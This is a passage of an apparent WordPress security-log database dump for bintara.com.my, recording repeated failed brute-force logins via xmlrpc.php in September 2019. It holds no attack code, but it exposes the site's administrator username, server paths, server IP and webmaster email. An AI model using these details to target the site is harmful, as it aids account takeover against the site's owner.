16:01:50',18214656,19510176,'https://bintara.com.my/xmlrpc.php',1,0,'185.70.8.20'),(23710,0,'brute_force','invalid-login::user-1','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:12:\"pentadbirweb\";s:7:\"user_id\";i:1;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"264\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"identity, gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.67.45.160\";s:11:\"REMOTE_PORT\";s:5:\"60500\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXU0BdMRc@ERIwwfvZDVNAAAAAI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567962118.2395\";s:12:\"REQUEST_TIME\";s:10:\"1567962118\";}}','notice','2019-09-08 17:02:01','2019-09-08 17:01:58',18357584,19596736,'https://bintara.com.my/xmlrpc.php',1,0,'185.67.45.160'),(23711,0,'brute_force','invalid-login::user-1','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:12:\"pentadbirweb\";s:7:\"user_id\";i:1;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"258\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"identity, gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.67.45.160\";s:11:\"REMOTE_PORT\";s:5:\"33470\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXU0Df3alkH3man4W2QOPQAAARM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567962126.1178\";s:12:\"REQUEST_TIME\";s:10:\"1567962126\";}}','notice','2019-09-08 17:02:07','2019-09-08 17:02:06',18266024,19510656,'https://bintara.com.my/xmlrpc.php',1,0,'185.67.45.160'),(23712,0,'brute_force','invalid-login::user-1','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:12:\"pentadbirweb\";s:7:\"user_id\";i:1;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"267\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"identity, gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:10:\"81.88.49.4\";s:11:\"REMOTE_PORT\";s:5:\"19864\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXVDFgx6tJVU9WhyPgYgdwAAAVA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567965974.6489\";s:12:\"REQUEST_TIME\";s:10:\"1567965974\";}}','notice','2019-09-08 18:06:17','2019-09-08 18:06:14',18355624,19596488,'https://bintara.com.my/xmlrpc.php',1,0,'81.88.49.4'),(23713,0,'brute_force','invalid-login::user-1','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:12:\"pentadbirweb\";s:7:\"user_id\";i:1;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"260\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"identity, gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:10:\"81.88.49.4\";s:11:\"REMOTE_PORT\";s:5:\"20195\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXVDHfATpeMTblrIf6HMWwAAANc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1567965982.359\";s:12:\"REQUEST_TIME\";s:10:\"1567965982\";}}','notice','2019-09-08 18:06:23','2019-09-08 18:06:22',18263392,19508088,'https://bintara.com.my/xmlrpc.php',1,0,'81.88.49.4'),(23714,0,'brute_force','invalid-login::username-jaipur','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:6:\"jaipur\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"486\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"5.39.113.152\";s:11:\"REMOTE_PORT\";s:5:\"41520\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXVfLQx6tJVU9WhyPgYxxAAAAUw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567973165.6413\";s:12:\"REQUEST_TIME\";s:10:\"1567973165\";}}','notice','2019-09-08 20:06:08','2019-09-08 20:06:06',18329784,19517224,'https://bintara.com.my/xmlrpc.php',1,0,'5.39.113.152'),(23715,0,'notification_center','send_scheduled','a:2:{s:13:\"notifications\";a:1:{i:0;s:6:\"digest\";}s:6:\"silent\";b:0;}','debug','2019-09-08 20:25:13','2019-09-08 20:25:09',17752576,18214856,'http://bintara.com.my/?page_id=18',1,0,'163.172.105.148'),(23716,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"128.199.68.128\";s:11:\"REMOTE_PORT\";s:5:\"42684\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXVstQx6tJVU9WhyPgY5aQAAAUg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567976629.9384\";s:12:\"REQUEST_TIME\";s:10:\"1567976629\";}}','notice','2019-09-08 21:03:52','2019-09-08 21:03:50',18301472,19598216,'https://bintara.com.my/xmlrpc.php',1,0,'128.199.68.128'),(23717,0,'brute_force','invalid-login::user-1','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:12:\"pentadbirweb\";s:7:\"user_id\";i:1;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"263\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"identity, gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"103.227.176.23\";s:11:\"REMOTE_PORT\";s:5:\"38144\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXWFcDPNytnTr525fg2kAgAAAQE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567982960.4834\";s:12:\"REQUEST_TIME\";s:10:\"1567982960\";}}','notice','2019-09-08 22:49:23','2019-09-08 22:49:20',18361824,19506816,'https://bintara.com.my/xmlrpc.php',1,0,'103.227.176.23'),(23718,0,'brute_force','invalid-login::user-1','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:12:\"pentadbirweb\";s:7:\"user_id\";i:1;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"257\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"identity, gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"103.227.176.23\";s:11:\"REMOTE_PORT\";s:5:\"38500\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXWFdUgM-KacsfRowV070wAAAsk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567982965.5873\";s:12:\"REQUEST_TIME\";s:10:\"1567982965\";}}','notice','2019-09-08 22:49:27','2019-09-08 22:49:26',18262144,19503040,'https://bintara.com.my/xmlrpc.php',1,0,'103.227.176.23'),(23719,0,'brute_force','invalid-login::username-client','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:6:\"client\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"480\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 